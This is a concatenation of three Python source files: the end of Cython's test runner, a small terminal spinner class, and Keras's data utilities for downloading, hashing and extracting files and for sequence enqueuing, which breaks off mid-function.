default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.shard_count > 1 and options.shard_num == -1:
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread():
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread():
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
from datetime import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.now
write = sys.__stderr__.write
stop = False
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2.6 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Main import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Main import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
if sys.version_info < (2, 7):
sys.stderr.write("--failfast not supported with Python < 2.7\n")
else:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
loader.py
|
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep
class Loader:
def __init__(self, desc="Loading...", end="Done!", timeout=0.1):
"""
A loader-like context manager
Args:
desc (str, optional): The loader's description. Defaults to "Loading...".
end (str, optional): Final print. Defaults to "Done!".
timeout (float, optional): Sleep time between prints. Defaults to 0.1.
"""
self.desc = desc
self.end = end
self.timeout = timeout
self._thread = Thread(target=self._animate, daemon=True)
self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
self.done = False
def start(self):
self._thread.start()
return self
def _animate(self):
for c in cycle(self.steps):
if self.done:
break
print(f"\r{self.desc} {c} ", flush=True, end="")
sleep(self.timeout)
def __enter__(self):
self.start()
def stop(self):
self.done = True
cols = get_terminal_size((80, 20)).columns
print("\r" + " " * cols, end="", flush=True)
print(f"\r{self.end}", flush=True)
def __exit__(self, exc_type, exc_value, tb):
# handle exceptions with those variables ^
self.stop()
if __name__ == "__main__":
with Loader("Loading with context manager..."):
for i in range(10):
sleep(0.25)
loader = Loader("Loading with object...", "That was fast!", 0.05).start()
for i in range(10):
sleep(0.25)
loader.stop()
|
data_utils.py
|
# Lint as python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from abc import abstractmethod
from contextlib import closing
import errno
import functools
import hashlib
import multiprocessing.dummy
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import weakref
import zipfile
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from keras.utils import tf_inspect
from keras.utils.generic_utils import Progbar
from keras.utils.io_utils import path_to_string
from tensorflow.python.util.tf_export import keras_export
try:
import queue
except ImportError:
import Queue as queue
try:
import typing
is_iterator = lambda x: isinstance(x, typing.Iterator)
except ImportError:
# Python2 uses next, and Python3 should have typing so __next__ is not needed.
is_iterator = lambda x: hasattr(x, '__iter__') and hasattr(x, 'next')
if True: # This gets transformed to `if sys.version_info[0] == 2:` in OSS. # pylint: disable=using-constant-test
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Args:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once on establishment of
the network connection and once after each block read thereafter. The
hook will be passed three arguments; a count of blocks transferred so
far, a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
builtin_iterators = (str, list, tuple, dict, set, frozenset)
if isinstance(x, (tf.Tensor, np.ndarray) + builtin_iterators):
return False
return tf_inspect.isgenerator(x) or isinstance(x, Sequence) or is_iterator(x)
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Args:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
file_path = path_to_string(file_path)
path = path_to_string(path)
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@keras_export('keras.utils.get_file')
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Example:
```python
path_to_downloaded_file = tf.keras.utils.get_file(
"flower_photos",
"https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz",
untar=True)
```
Args:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of `extract` argument.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of `file_hash` argument.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are `'md5'`, `'sha256'`, and `'auto'`.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are `'auto'`, `'tar'`, `'zip'`, and `None`.
`'tar'` includes tar, tar.gz, and tar.bz files.
The default `'auto'` corresponds to `['tar', 'zip']`.
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the default directory `~/.keras/`.
Returns:
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
_makedirs_exist_ok(datadir)
fname = path_to_string(fname)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' + file_hash +
' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _makedirs_exist_ok(datadir):
if six.PY2:
# Python 2 doesn't have the exist_ok arg, so we try-except here.
try:
os.makedirs(datadir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
os.makedirs(datadir, exist_ok=True) # pylint: disable=unexpected-keyword-arg
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
_hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Args:
fpath: path to the file being validated
algorithm: hash algorithm, one of `'auto'`, `'sha256'`, or `'md5'`.
The default `'auto'` detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(hash) == 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Args:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(file_hash) == 64):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class ThreadsafeIter(object):
"""Wrap an iterator with a lock and propagate exceptions to all threads."""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
# After a generator throws an exception all subsequent next() calls raise a
# StopIteration Exception. This, however, presents an issue when mixing
# generators and threading because it means the order of retrieval need not
# match the order in which the generator was called. This can make it appear
# that a generator exited normally when in fact the terminating exception is
# just in a different thread. In order to provide thread safety, once
# self.it has thrown an exception we continue to throw the same exception.
self._exception = None
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
with self.lock:
if self._exception:
raise self._exception # pylint: disable=raising-bad-type
try:
return next(self.it)
except Exception as e:
self._exception = e
raise
def threadsafe_generator(f):
@functools.wraps(f)
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
@keras_export('keras.utils.Sequence')
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once
on each sample per epoch which is not the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Args:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Args:
seq: `Sequence` instance.
Yields:
Batches of data from the `Sequence`.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
# Because multiprocessing pools are inherently unsafe, starting from a clean
# state can be essential to avoiding deadlocks. In order to accomplish this, we
# need to be able to check on the status of Pools that we create.
_DATA_POOLS = weakref.WeakSet()
_WORKER_ID_QUEUE = None # Only created if needed.
_WORKER_IDS = set()
_FORCE_THREADPOOL = False
_FORCE_THREADPOOL_LOCK = threading.RLock()
def dont_use_multiprocessing_pool(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with _FORCE_THREADPOOL_LOCK:
global _FORCE_THREADPOOL
old_force_threadpool, _FORCE_THREADPOOL = _FORCE_THREADPOOL, True
out = f(*args, **kwargs)
_FORCE_THREADPOOL = old_force_threadpool
return out
return wrapped
def get_pool_class(use_multiprocessing):
global _FORCE_THREADPOOL
if not use_multiprocessing or _FORCE_THREADPOOL:
return multiprocessing.dummy.Pool # ThreadPool
return multiprocessing.Pool
def get_worker_id_queue():
"""Lazily create the queue to track worker ids."""
global _WORKER_ID_QUEUE
if _WORKER_ID_QUEUE is None:
_WORKER_ID_QUEUE = multiprocessing.Queue()
return _WORKER_ID_QUEUE
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Args:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@keras_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Args:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: get_pool_class(False)(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
def __del__(self):
if self.is_running():
self.stop()
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@keras_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Args:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, None, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
